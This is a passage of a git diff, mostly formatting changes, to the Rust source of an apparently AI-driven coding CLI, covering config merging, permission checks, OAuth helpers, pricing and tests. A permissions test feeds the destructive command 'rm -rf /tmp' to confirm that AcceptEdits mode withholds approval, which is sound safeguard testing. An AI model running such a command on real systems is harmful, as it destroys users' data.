over.skills.urls { if !urls.contains(&u) { urls.push(u); } } + for u in over.skills.urls { + if !urls.contains(&u) { + urls.push(u); + } + } SkillsConfig { paths, urls } }, managed_agents: over.managed_agents.or(base.managed_agents), @@ -1784,10 +1926,19 @@ pub mod config { show_cwd: over.show_cwd || base.show_cwd, show_git_branch: over.show_git_branch || base.show_git_branch, auto_compact: over.auto_compact || base.auto_compact, - file_autocomplete_limit: if over.file_autocomplete_limit != 0 { over.file_autocomplete_limit } else { base.file_autocomplete_limit }, - file_autocomplete_show_hidden_files: over.file_autocomplete_show_hidden_files || base.file_autocomplete_show_hidden_files, + file_autocomplete_limit: if over.file_autocomplete_limit != 0 { + over.file_autocomplete_limit + } else { + base.file_autocomplete_limit + }, + file_autocomplete_show_hidden_files: over.file_autocomplete_show_hidden_files + || base.file_autocomplete_show_hidden_files, file_injection_enabled: over.file_injection_enabled || base.file_injection_enabled, - file_injection_max_size: if over.file_injection_max_size != 0 { over.file_injection_max_size } else { base.file_injection_max_size }, + file_injection_max_size: if over.file_injection_max_size != 0 { + over.file_injection_max_size + } else { + base.file_injection_max_size + }, completion_toast: over.completion_toast.or(base.completion_toast), bell_on_complete: over.bell_on_complete || base.bell_on_complete, } @@ -1804,7 +1955,9 @@ pub mod config { while let Some(ch) = chars.next() { if in_string { - if ch == '"' && prev_char != '\\' { in_string = false; } + if ch == '"' && prev_char != '\\' { + in_string = false; + } result.push(ch); prev_char = ch; continue; @@ -1819,15 +1972,24 @@ pub mod config { match chars.peek() { Some('/') => { // Line comment — skip to end of line. - for c in chars.by_ref() { if c == '\n' { result.push('\n'); break; } } + for c in chars.by_ref() { + if c == '\n' { + result.push('\n'); + break; + } + } } Some('*') => { // Block comment — skip until `*/`. chars.next(); let mut prev = '\0'; for c in chars.by_ref() { - if prev == '*' && c == '/' { break; } - if c == '\n' { result.push('\n'); } + if prev == '*' && c == '/' { + break; + } + if c == '\n' { + result.push('\n'); + } prev = c; } } @@ -1849,16 +2011,14 @@ pub mod config { loop { match result.find("{env:") { None => break, - Some(start) => { - match result[start..].find('}') { - None => break, - Some(rel_end) => { - let var_name = result[start + 5..start + rel_end].to_string(); - let value = std::env::var(&var_name).unwrap_or_default(); - result.replace_range(start..start + rel_end + 1, &value); - } + Some(start) => match result[start..].find('}') { + None => break, + Some(rel_end) => { + let var_name = result[start + 5..start + rel_end].to_string(); + let value = std::env::var(&var_name).unwrap_or_default(); + result.replace_range(start..start + rel_end + 1, &value); } - } + }, } } result @@ -1940,7 +2100,10 @@ pub mod config { assert_eq!(merged.config.mcp_servers[0].name, "global"); assert!(merged.config.enable_all_mcp_servers); assert_eq!(merged.projects["repo"].mcp_servers.len(), 1); - assert_eq!(merged.projects["repo"].mcp_servers[0].name, "trusted-project"); + assert_eq!( + merged.projects["repo"].mcp_servers[0].name, + "trusted-project" + ); } } } @@ -2049,10 +2212,7 @@ pub mod context { // Platform information parts.push(format!("Platform: {}", std::env::consts::OS)); - parts.push(format!( - "Working directory: {}", - self.cwd.display() - )); + parts.push(format!("Working directory: {}", self.cwd.display())); if let Some(git_context) = self.get_git_context().await { parts.push(git_context); @@ -2071,9 +2231,7 @@ pub mod context { pub async fn build_user_context(&self) -> String { let mut parts = vec![]; - let date = chrono::Local::now() - .format("%A, %B %d, %Y") - .to_string(); + let date = chrono::Local::now().format("%A, %B %d, %Y").to_string(); parts.push(format!("Today's date is {}.", date)); if !self.disable_claude_mds { @@ -2123,8 +2281,9 @@ pub mod context { // Global ~/.coven-code/AGENTS.md if let Some(home) = dirs::home_dir() { - let global_claude_md = - home.join(".coven-code").join(crate::constants::CLAUDE_MD_FILENAME); + let global_claude_md = home + .join(".coven-code") + .join(crate::constants::CLAUDE_MD_FILENAME); if global_claude_md.exists() { if let Ok(content) = tokio::fs::read_to_string(&global_claude_md).await { claude_mds.push(format!( @@ -2349,10 +2508,7 @@ pub mod permissions { } else { "\nThis will write to the filesystem." }; - format!( - "{} wants to write to `{}`{}", - tool_name, target, extra - ) + format!("{} wants to write to `{}`{}", tool_name, target, extra) } PermissionLevel::Network => { let url = path.unwrap_or(description); @@ -2378,8 +2534,8 @@ pub mod permissions { working_dir: Option<&std::path::Path>, allowed_roots: &[std::path::PathBuf], ) -> bool { - let canonical_path = std::fs::canonicalize(path) - .unwrap_or_else(|_| std::path::PathBuf::from(path)); + let canonical_path = + std::fs::canonicalize(path).unwrap_or_else(|_| std::path::PathBuf::from(path)); let mut roots: Vec = Vec::new(); if let Some(root) = working_dir { @@ -2500,8 +2656,17 @@ pub mod permissions { PermissionLevel::Read if !matches!( tool_name, - "Read" | "Glob" | "Grep" | "ListMcpResources" | "ReadMcpResource" | "LSP" | "Skill" - ) => PermissionLevel::Execute, + "Read" + | "Glob" + | "Grep" + | "ListMcpResources" + | "ReadMcpResource" + | "LSP" + | "Skill" + ) => + { + PermissionLevel::Execute + } other => other, }; let read_in_workspace = path.is_some_and(|target| { @@ -2533,8 +2698,7 @@ pub mod permissions { | PermissionLevel::Write | PermissionLevel::Execute | PermissionLevel::Network => { - let reason = - format_permission_reason(tool_name, description, path, level); + let reason = format_permission_reason(tool_name, description, path, level); PermissionDecision::Ask { reason } } } @@ -2714,15 +2878,13 @@ pub mod permissions { use crate::config::PermissionMode; match self.mode { PermissionMode::BypassPermissions => PermissionDecision::Allow, - PermissionMode::AcceptEdits => { - if request.tool_name == "Edit" { - PermissionDecision::Allow - } else if request.is_read_only { - PermissionDecision::Allow - } else { - PermissionDecision::Deny - } + PermissionMode::AcceptEdits => { + if request.tool_name == "Edit" || request.is_read_only { + PermissionDecision::Allow + } else { + PermissionDecision::Deny } + } PermissionMode::Plan => { if request.is_read_only { PermissionDecision::Allow @@ -2967,7 +3129,10 @@ pub mod permissions { action: PermissionAction::Deny, scope: PermissionScope::Session, }); - assert_eq!(m.evaluate("Bash", "echo hi", None, None, &[]), PermissionDecision::Deny); + assert_eq!( + m.evaluate("Bash", "echo hi", None, None, &[]), + PermissionDecision::Deny + ); } #[test] @@ -2992,7 +3157,13 @@ pub mod permissions { fn accept_edits_only_allows_edit() { let m = mgr(PermissionMode::AcceptEdits); assert_eq!( - m.evaluate("Edit", "edit file", Some("/workspace/src/lib.rs"), None, &[]), + m.evaluate( + "Edit", + "edit file", + Some("/workspace/src/lib.rs"), + None, + &[] + ), PermissionDecision::Allow ); match m.evaluate("Bash", "rm -rf /tmp", None, None, &[]) { @@ -3033,8 +3204,12 @@ pub mod permissions { #[test] fn format_reason_bash() { - let s = - format_permission_reason("Bash", "This will execute a shell command.", None, PermissionLevel::Execute); + let s = format_permission_reason( + "Bash", + "This will execute a shell command.", + None, + PermissionLevel::Execute, + ); assert_eq!(s, "This will execute a shell command."); } @@ -3046,7 +3221,10 @@ pub mod permissions { None, PermissionLevel::Execute, ); - assert_eq!(s, "[High risk] This may modify system-wide security policy."); + assert_eq!( + s, + "[High risk] This may modify system-wide security policy." + ); } #[test] @@ -3241,25 +3419,20 @@ pub mod history { } let mut sessions = vec![]; - match tokio::fs::read_dir(&dir).await { - Ok(mut entries) => { - while let Ok(Some(entry)) = entries.next_entry().await { - let path = entry.path(); - if path.extension().and_then(|s| s.to_str()) == Some("json") { - if let Ok(content) = tokio::fs::read_to_string(&path).await { - if let Ok(session) = - serde_json::from_str::(&content) - { - sessions.push(session); - } + if let Ok(mut entries) = tokio::fs::read_dir(&dir).await { + while let Ok(Some(entry)) = entries.next_entry().await { + let path = entry.path(); + if path.extension().and_then(|s| s.to_str()) == Some("json") { + if let Ok(content) = tokio::fs::read_to_string(&path).await { + if let Ok(session) = serde_json::from_str::(&content) { + sessions.push(session); } } } } - Err(_) => {} } - sessions.sort_by(|a, b| b.updated_at.cmp(&a.updated_at)); + sessions.sort_by_key(|session| std::cmp::Reverse(session.updated_at)); sessions } @@ -3450,9 +3623,10 @@ pub mod cost { /// Pick pricing based on model name substring matching. pub fn for_model(model: &str) -> Self { // Check for free models first (those with "-free" suffix, "free/" prefix, or upstream-prefixed free model) - if model.ends_with("-free") || model.starts_with("free/") { - Self::FREE - } else if is_free_upstream_model(model) { + if model.ends_with("-free") + || model.starts_with("free/") + || is_free_upstream_model(model) + { Self::FREE } else if model.contains("opus") { Self::OPUS @@ -3501,13 +3675,7 @@ pub mod cost { *self.pricing.write() = ModelPricing::for_model(model); } - pub fn add_usage( - &self, - input: u64, - output: u64, - cache_creation: u64, - cache_read: u64, - ) { + pub fn add_usage(&self, input: u64, output: u64, cache_creation: u64, cache_read: u64) { self.input_tokens.fetch_add(input, Ordering::Relaxed); self.output_tokens.fetch_add(output, Ordering::Relaxed); self.cache_creation_tokens @@ -3714,10 +3882,8 @@ pub mod oauth { pub const CONSOLE_AUTHORIZE_URL: &str = "https://platform.claude.com/oauth/authorize"; pub const CLAUDE_AI_AUTHORIZE_URL: &str = "https://claude.com/cai/oauth/authorize"; pub const TOKEN_URL: &str = "https://platform.claude.com/v1/oauth/token"; - pub const API_KEY_URL: &str = - "https://api.anthropic.com/api/oauth/claude_cli/create_api_key"; - pub const MANUAL_REDIRECT_URL: &str = - "https://platform.claude.com/oauth/code/callback"; + pub const API_KEY_URL: &str = "https://api.anthropic.com/api/oauth/claude_cli/create_api_key"; + pub const MANUAL_REDIRECT_URL: &str = "https://platform.claude.com/oauth/code/callback"; pub const CLAUDEAI_SUCCESS_URL: &str = "https://platform.claude.com/oauth/code/success?app=claude-code"; pub const CONSOLE_SUCCESS_URL: &str = "https://platform.claude.com/buy_credits\ @@ -3773,7 +3939,11 @@ pub mod oauth { /// - Claude.ai flow: the `access_token` itself (Bearer) pub fn effective_credential(&self) -> Option<&str> { if self.uses_bearer_auth() { - if self.access_token.is_empty() { None } else { Some(&self.access_token) } + if self.access_token.is_empty() { + None + } else { + Some(&self.access_token) + } } else { self.api_key.as_deref() } @@ -3823,8 +3993,8 @@ pub mod oauth { /// If `label` is None, derives the id from email/account_uuid. pub async fn save_and_register(&self, label: Option<&str>) -> anyhow::Result { use crate::accounts::{ - AccountProfile, AccountRegistry, ensure_unique_profile_id, - slugify_profile_id, PROVIDER_ANTHROPIC, + ensure_unique_profile_id, slugify_profile_id, AccountProfile, AccountRegistry, + PROVIDER_ANTHROPIC, }; let mut registry = AccountRegistry::load(); @@ -3837,8 +4007,7 @@ pub mod oauth { .into_iter() .find(|p| { (self.email.is_some() && p.email == self.email) - || (self.account_uuid.is_some() - && p.account_id == self.account_uuid) + || (self.account_uuid.is_some() && p.account_id == self.account_uuid) }) .map(|p| p.id); @@ -3860,7 +4029,7 @@ pub mod oauth { let profile = AccountProfile { id: id.clone(), - label: label.map(|l| slugify_profile_id(l)), + label: label.map(slugify_profile_id), email: self.email.clone(), account_id: self.account_uuid.clone(), organization_uuid: self.organization_uuid.clone(), @@ -3916,7 +4085,10 @@ pub mod oauth { /// `purge_all` is true) and drop the profile from the registry. pub async fn clear() -> anyhow::Result<()> { let mut registry = crate::accounts::AccountRegistry::load(); - if let Some(active) = registry.active(crate::accounts::PROVIDER_ANTHROPIC).map(String::from) { + if let Some(active) = registry + .active(crate::accounts::PROVIDER_ANTHROPIC) + .map(String::from) + { registry.remove(crate::accounts::PROVIDER_ANTHROPIC, &active)?; } // Also remove any legacy file. @@ -3970,8 +4142,7 @@ pub mod oauth { callback_port: u16, is_manual: bool, ) -> String { - let mut u = url::Url::parse(authorize_base) - .expect("valid OAuth authorize base URL"); + let mut u = url::Url::parse(authorize_base).expect("valid OAuth authorize base URL"); { let mut q = u.query_pairs_mut(); q.append_pair("code", "true"); // tells the login page to show Claude Max upsell @@ -3999,29 +4170,29 @@ pub use oauth::OAuthTokens; // New modules: keybindings, voice, analytics, lsp, team_memory_sync, // system_prompt, memdir, oauth_config // --------------------------------------------------------------------------- -pub mod keybindings; -pub mod voice; +pub mod accounts; pub mod analytics; -pub mod lsp; -pub mod session_tracing; +pub mod bash_classifier; +pub mod codex_oauth; pub mod context_collapse; -pub mod team_memory_sync; -pub mod system_prompt; +pub mod effort; +pub mod feature_gates; +pub mod import_config; +pub mod keybindings; +pub mod lsp; pub mod memdir; -pub mod oauth_config; -pub mod codex_oauth; -pub mod accounts; pub mod migrations; +pub mod oauth_config; pub mod output_styles; -pub mod feature_gates; -pub mod tips; -pub mod remote_settings; -pub mod settings_sync; -pub mod import_config; -pub mod effort; pub mod prompt_history; -pub mod bash_classifier; pub mod ps_classifier; +pub mod remote_settings; +pub mod session_tracing; +pub mod settings_sync; +pub mod system_prompt; +pub mod team_memory_sync; +pub mod tips; +pub mod voice; // --------------------------------------------------------------------------- // tasks module — background task registry @@ -4180,6 +4351,12 @@ pub mod tasks { #[cfg(test)] mod tests { use super::*; + use std::sync::{Mutex, OnceLock}; + + fn env_test_lock() -> std::sync::MutexGuard<'static, ()> { + static LOCK: OnceLock> = OnceLock::new(); + LOCK.get_or_init(|| Mutex::new(())).lock().unwrap() + } #[test] fn test_message_user() { @@ -4239,33 +4416,43 @@ mod tests { #[test] fn test_config_effective_model_override() { - let mut cfg = crate::config::Config::default(); - cfg.model = Some("claude-haiku-4-5-20251001".to_string()); + let cfg = crate::config::Config { + model: Some("claude-haiku-4-5-20251001".to_string()), + ..Default::default() + }; assert_eq!(cfg.effective_model(), "claude-haiku-4-5-20251001"); } #[test] fn test_config_effective_max_tokens_default() { let cfg = crate::config::Config::default(); - assert_eq!(cfg.effective_max_tokens(), crate::constants::DEFAULT_MAX_TOKENS); + assert_eq!( + cfg.effective_max_tokens(), + crate::constants::DEFAULT_MAX_TOKENS + ); } #[test] fn test_config_effective_max_tokens_override() { - let mut cfg = crate::config::Config::default(); - cfg.max_tokens = Some(8192); + let cfg = crate::config::Config { + max_tokens: Some(8192), + ..Default::default() + }; assert_eq!(cfg.effective_max_tokens(), 8192); } #[test] fn test_config_resolve_api_key_from_config() { + let _env_lock = env_test_lock(); // When config.api_key is set, it should be returned regardless of env var // (Config key takes priority — resolve_api_key returns it first) let orig = std::env::var("ANTHROPIC_API_KEY").ok(); std::env::remove_var("ANTHROPIC_API_KEY"); - let mut cfg = crate::config::Config::default(); - cfg.api_key = Some("sk-ant-config-key".to_string()); + let cfg = crate::config::Config { + api_key: Some("sk-ant-config-key".to_string()), + ..Default::default() + }; assert_eq!(cfg.resolve_api_key(), Some("sk-ant-config-key".to_string())); if let Some(k) = orig { @@ -4275,6 +4462,7 @@ mod tests { #[test] fn test_config_resolve_api_key_none() { + let _env_lock = env_test_lock(); // Temporarily ensure no env var override let orig = std::env::var("ANTHROPIC_API_KEY").ok(); std::env::remove_var("ANTHROPIC_API_KEY"); @@ -4353,6 +4541,7 @@ mod tests { #[test] fn test_config_resolve_api_key_from_env() { + let _env_lock = env_test_lock(); let orig = std::env::var("ANTHROPIC_API_KEY").ok(); std::env::set_var("ANTHROPIC_API_KEY", "sk-ant-env-key"); @@ -4375,7 +4564,10 @@ mod tests { expires_at_ms: None, ..Default::default() }; - assert!(!tokens.is_expired(), "Token with no expiry should not be considered expired"); + assert!( + !tokens.is_expired(), + "Token with no expiry should not be considered expired" + ); } #[test] @@ -4408,7 +4600,10 @@ mod tests { expires_at_ms: Some(chrono::Utc::now().timestamp_millis() + 3 * 60 * 1000), ..Default::default() }; - assert!(tokens.is_expired(), "Token within 5-min buffer should be considered expired"); + assert!( + tokens.is_expired(), + "Token within 5-min buffer should be considered expired" + ); } #[test] @@ -4478,9 +4673,15 @@ mod tests { fn test_pkce_code_verifier_length() { let verifier = crate::oauth::generate_code_verifier(); // 32 bytes base64url-encoded (no padding) = ceil(32 * 4/3) = 43 chars - assert_eq!(verifier.len(), 43, "Code verifier should be 43 base64url chars (32 bytes)"); + assert_eq!( + verifier.len(), + 43, + "Code verifier should be 43 base64url chars (32 bytes)" + ); // Must only contain URL-safe base64 chars - assert!(verifier.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); + assert!(verifier + .chars() + .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); } #[test] @@ -4488,8 +4689,14 @@ mod tests { let verifier = crate::oauth::generate_code_verifier(); let challenge = crate::oauth::generate_code_challenge(&verifier); // SHA256 = 32 bytes → 43 base64url chars - assert_eq!(challenge.len(), 43, "Code challenge should be 43 base64url chars (SHA256 = 32 bytes)"); - assert!(challenge.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); + assert_eq!( + challenge.len(), + 43, + "Code challenge should be 43 base64url chars (SHA256 = 32 bytes)" + ); + assert!(challenge + .chars() + .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); } #[test] @@ -4512,7 +4719,9 @@ mod tests { fn test_pkce_state_length_and_format() { let state = crate::oauth::generate_state(); assert_eq!(state.len(), 43); - assert!(state.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); + assert!(state + .chars() + .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')); } // ---- Auth URL building tests -------------------------------------------- @@ -4549,10 +4758,7 @@ mod tests { 9999, true, // manual ); - assert!( - url.contains("redirect_uri="), - "URL must have redirect_uri" - ); + assert!(url.contains("redirect_uri="), "URL must have redirect_uri"); // Manual redirect should NOT be localhost assert!( !url.contains("localhost"), @@ -4673,8 +4879,12 @@ mod tests { #[test] fn test_message_get_all_text_multiple_blocks() { let msg = Message::assistant_blocks(vec![ - ContentBlock::Text { text: "First ".into() }, - ContentBlock::Text { text: "Second".into() }, + ContentBlock::Text { + text: "First ".into(), + }, + ContentBlock::Text { + text: "Second".into(), + }, ]); assert_eq!(msg.get_all_text(), "First Second"); } @@ -4686,7 +4896,9 @@ mod tests { thinking: "reasoning".into(), signature: "sig".into(), }, - ContentBlock::Text { text: "answer".into() }, + ContentBlock::Text { + text: "answer".into(), + }, ]); assert_eq!(msg.get_text(), Some("answer")); } @@ -4725,30 +4937,84 @@ mod tests { #[test] fn test_model_pricing_free_variants() { // Test that models ending with -free use FREE pricing - assert_eq!(cost::ModelPricing::for_model("deepseek-v4-flash-free"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("zen/minimax-m2.5-free"), cost::ModelPricing::FREE); + assert_eq!( + cost::ModelPricing::for_model("deepseek-v4-flash-free"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("zen/minimax-m2.5-free"), + cost::ModelPricing::FREE + ); // Test that models starting with free/ use FREE pricing - assert_eq!(cost::ModelPricing::for_model("free/auto"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("free/some-model"), cost::ModelPricing::FREE); + assert_eq!( + cost::ModelPricing::for_model("free/auto"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("free/some-model"), + cost::ModelPricing::FREE + ); // Test that upstream-prefixed free models use FREE pricing - assert_eq!(cost::ModelPricing::for_model("groq/llama-3.3-70b-versatile"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("cerebras/qwen-3-235b-a22b-instruct-2507"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("google/gemini-2.5-flash"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("mistral/mistral-large-latest"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("sambanova/Meta-Llama-3.3-70B-Instruct"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("nvidia/meta/llama-3.3-70b-instruct"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("cohere/command-r-plus"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("openrouter/free"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("opencode-zen/minimax-m2.5-free"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("zai/glm-4.6"), cost::ModelPricing::FREE); - assert_eq!(cost::ModelPricing::for_model("zhipuai/glm-4.5"), cost::ModelPricing::FREE); + assert_eq!( + cost::ModelPricing::for_model("groq/llama-3.3-70b-versatile"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("cerebras/qwen-3-235b-a22b-instruct-2507"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("google/gemini-2.5-flash"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("mistral/mistral-large-latest"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("sambanova/Meta-Llama-3.3-70B-Instruct"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("nvidia/meta/llama-3.3-70b-instruct"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("cohere/command-r-plus"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("openrouter/free"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("opencode-zen/minimax-m2.5-free"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("zai/glm-4.6"), + cost::ModelPricing::FREE + ); + assert_eq!( + cost::ModelPricing::for_model("zhipuai/glm-4.5"), + cost::ModelPricing::FREE + ); // Test that other models use their appropriate pricing - assert_eq!(cost::ModelPricing::for_model("claude-opus"), cost::ModelPricing::OPUS); - assert_eq!(cost::ModelPricing::for_model("claude-haiku"), cost::ModelPricing::HAIKU); - assert_eq!(cost::ModelPricing::for_model("claude-sonnet"), cost::ModelPricing::SONNET); + assert_eq!( + cost::ModelPricing::for_model("claude-opus"), + cost::ModelPricing::OPUS + ); + assert_eq!( + cost::ModelPricing::for_model("claude-haiku"), + cost::ModelPricing::HAIKU + ); + assert_eq!( + cost::ModelPricing::for_model("claude-sonnet"), + cost::ModelPricing::SONNET + ); } #[test] @@ -4781,10 +5047,16 @@ mod tests { #[test] fn builtin_presets_all_have_valid_model_format() { for preset in builtin_managed_agent_presets() { - assert!(preset.manager_model.contains('/'), - "Preset {} manager_model must be provider/model", preset.name); - assert!(preset.executor_model.contains('/'), - "Preset {} executor_model must be provider/model", preset.name); + assert!( + preset.manager_model.contains('/'), + "Preset {} manager_model must be provider/model", + preset.name + ); + assert!( + preset.executor_model.contains('/'), + "Preset {} executor_model must be provider/model", + preset.name + ); } } } diff --git a/src-rust/crates/core/src/lsp.rs b/src-rust/crates/core/src/lsp.rs index 8126370..310e0fc 100644 --- a/src-rust/crates/core/src/lsp.rs +++ b/src-rust/crates/core/src/lsp.rs @@ -1,1487 +1,1444 @@ -//! Language Server Protocol client. -//! -//! Implements the client side of the LSP JSON-RPC protocol over the LSP -//! server's stdin/stdout. Each [`LspClient`] manages one server process; -//! [`LspManager`] tracks a collection of clients keyed by server name. -//! -//! # Protocol overview -//! Messages are framed with a `Content-Length` HTTP-style header: -//! ```text -//! Content-Length: \r\n -//! \r\n -//! -//! ``` -//! The server sends the same framing back on its stdout. - -use dashmap::DashMap; -use serde::{Deserialize, Serialize}; -use serde_json::json; -use std::collections::HashMap; -use std::path::Path; -use std::sync::{ - atomic::{AtomicU64, Ordering}, - Arc, -}; -use tokio::io::{AsyncBufReadExt, AsyncReadExt, AsyncWriteExt, BufReader, BufWriter}; -use tokio::process::{Child, ChildStdin, ChildStdout, Command}; -use tokio::sync::{oneshot, Mutex}; - -// --------------------------------------------------------------------------- -// Configuration -// --------------------------------------------------------------------------- - -/// Configuration for a single LSP server process. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct LspServerConfig { - /// Display name, e.g. "rust-analyzer" - pub name: String, - /// Path or name of the server binary, e.g. "rust-analyzer" - pub command: String, - /// Command-line arguments passed to the server binary - pub args: Vec, - /// Glob patterns that activate this server, e.g. `["*.rs", "*.toml"]` - pub file_patterns: Vec, - /// Optional server-specific initialization options (passed in LSP `initialize`) - pub initialization_options: Option, - /// Map of file extension (e.g. `.rs`) to LSP language identifier (e.g. - /// `rust`). Used to supply `textDocument/didOpen::languageId` and to - /// route files to the right server. - #[serde(default)] - pub extension_to_language: HashMap, - /// Optional extra environment variables for the server process. - #[serde(default)] - pub env: HashMap, -} - -impl LspServerConfig { - /// Look up the LSP language identifier for `file_path`, falling back to - /// `"plaintext"` when the extension is not mapped. - pub fn language_for_file(&self, file_path: &str) -> String { - let ext = Path::new(file_path) - .extension() - .and_then(|e| e.to_str()) - .map(|e| format!(".{}", e.to_lowercase())) - .unwrap_or_default(); - self.extension_to_language - .get(&ext) - .cloned() - .unwrap_or_else(|| "plaintext".to_string()) - } -} - -// --------------------------------------------------------------------------- -// Diagnostics -// --------------------------------------------------------------------------- - -/// A single diagnostic emitted by an LSP server. -#[derive(Debug, Clone)] -pub struct LspDiagnostic { - /// Workspace-relative or absolute file path - pub file: String, - /// 1-based line number - pub line: u32, - /// 1-based column number - pub column: u32, - pub severity: DiagnosticSeverity, - pub message: String, - /// The LSP server that produced this diagnostic (e.g. "rust-analyzer") - pub source: Option, - /// Diagnostic code (e.g. "E0308"), if provided by the server - pub code: Option, -} - -/// Severity level of a diagnostic, matching the LSP spec. -#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)] -pub enum DiagnosticSeverity { - Error = 1, - Warning = 2, - Information = 3, - Hint = 4, -} - -impl DiagnosticSeverity { - pub fn as_str(&self) -> &'static str { - match self { - Self::Error => "error", - Self::Warning => "warning", - Self::Information => "info", - Self::Hint => "hint", - } - } - - fn from_lsp_int(n: u64) -> Self { - match n { - 1 => Self::Error, - 2 => Self::Warning, - 3 => Self::Information, - _ => Self::Hint, - } - } -} - -// --------------------------------------------------------------------------- -// JSON-RPC framing helpers -// --------------------------------------------------------------------------- - -async fn send_message( - writer: &mut BufWriter, - body: &str, -) -> anyhow::Result<()> { - let header = format!("Content-Length: {}\r\n\r\n", body.len()); - writer.write_all(header.as_bytes()).await?; - writer.write_all(body.as_bytes()).await?; - writer.flush().await?; - Ok(()) -} - -async fn read_message( - reader: &mut BufReader, -) -> anyhow::Result { - let mut content_length: usize = 0; - loop { - let mut line = String::new(); - let n = reader.read_line(&mut line).await?; - if n == 0 { - return Err(anyhow::anyhow!("LSP server closed stdout")); - } - let trimmed = line.trim_end_matches(['\r', '\n']); - if trimmed.is_empty() { - break; - } - if let Some(val) = trimmed.strip_prefix("Content-Length: ") { - content_length = val.trim().parse()?; - } - } - if content_length == 0 { - return Err(anyhow::anyhow!("LSP message missing Content-Length header")); - } - let mut buf = vec![0u8; content_length]; - reader.read_exact(&mut buf).await?; - Ok(serde_json::from_slice(&buf)?) -} - -// --------------------------------------------------------------------------- -// LspClient -// --------------------------------------------------------------------------- - -type PendingMap = Arc>>; - -/// A running LSP client connected to a single server process. -pub struct LspClient { - pub server_name: String, - pub server_config: LspServerConfig, - /// The child process handle; `None` after shutdown. - process: Option, - request_id: Arc, - pending: PendingMap, - /// Diagnostics indexed by URI. - pub diagnostics: Arc>>, - is_initialized: bool, - /// Shared writer — wrapped in a Mutex so `start_receiver_task` and the - /// public `send_*` methods can both hold it. - writer: Option>>>, -} - -impl LspClient { - /// Spawn the server process and return a connected client. The I/O pump - /// task is started in the background. - pub async fn start(config: LspServerConfig) -> anyhow::Result { - let mut cmd = Command::new(&config.command); - cmd.args(&config.args) - .stdin(std::process::Stdio::piped()) - .stdout(std::process::Stdio::piped()) - .stderr(std::process::Stdio::piped()) - .kill_on_drop(true); - - // Inject environment variables - for (k, v) in &config.env { - cmd.env(k, v); - } - - // On Windows, suppress the console window (CREATE_NO_WINDOW = 0x0800_0000). - // tokio::process::Command exposes creation_flags() directly on Windows. - #[cfg(target_os = "windows")] - { - cmd.creation_flags(0x0800_0000u32); - } - - let mut child = cmd.spawn().map_err(|e| { - anyhow::anyhow!( - "Failed to start LSP server '{}': {}", - config.command, - e - ) - })?; - - let stdin = child - .stdin - .take() - .ok_or_else(|| anyhow::anyhow!("LSP server stdin not available"))?; - let stdout = child - .stdout - .take() - .ok_or_else(|| anyhow::anyhow!("LSP server stdout not available"))?; - - let pending: PendingMap = Arc::new(DashMap::new()); - let diagnostics: Arc>> = - Arc::new(DashMap::new()); - - let writer = Arc::new(Mutex::new(BufWriter::new(stdin))); - let pending_clone = pending.clone(); - let diagnostics_clone = diagnostics.clone(); - let server_name = config.name.clone(); - - // Consume stderr in the background so the OS pipe buffer never fills up - if let Some(stderr) = child.stderr.take() { - let name = server_name.clone(); - tokio::spawn(async move { - let mut lines = BufReader::new(stderr).lines(); - while let Ok(Some(line)) = lines.next_line().await { - tracing::debug!("[LSP SERVER {}] {}", name, line); - } - }); - } - - // I/O pump: reads messages from stdout and resolves pending requests - // or stores incoming diagnostics. - tokio::spawn(async move { - let mut reader = BufReader::new(stdout); - loop { - match read_message(&mut reader).await { - Ok(msg) => { - dispatch_incoming( - msg, - &pending_clone, - &diagnostics_clone, - &server_name, - ); - } - Err(e) => { - tracing::debug!( - "LSP server {} reader exited: {}", - server_name, - e - ); - break; - } - } - } - }); - - Ok(Self { - server_name: config.name.clone(), - server_config: config, - process: Some(child), - request_id: Arc::new(AtomicU64::new(1)), - pending, - diagnostics, - is_initialized: false, - writer: Some(writer), - }) - } - - fn next_id(&self) -> u64 { - self.request_id.fetch_add(1, Ordering::SeqCst) - } - - /// Send a JSON-RPC request and wait for the matching response. - async fn send_request_inner( - &self, - method: &str, - params: serde_json::Value, - ) -> anyhow::Result { - let id = self.next_id(); - let msg = json!({ - "jsonrpc": "2.0", - "id": id, - "method": method, - "params": params, - }); - let body = serde_json::to_string(&msg)?; - - let (tx, rx) = oneshot::channel(); - self.pending.insert(id, tx); - - { - let writer = self - .writer - .as_ref() - .ok_or_else(|| anyhow::anyhow!("LSP client already shut down"))?; - let mut w = writer.lock().await; - send_message(&mut w, &body).await?; - } - - let response = - tokio::time::timeout(std::time::Duration::from_secs(30), rx) - .await - .map_err(|_| { - 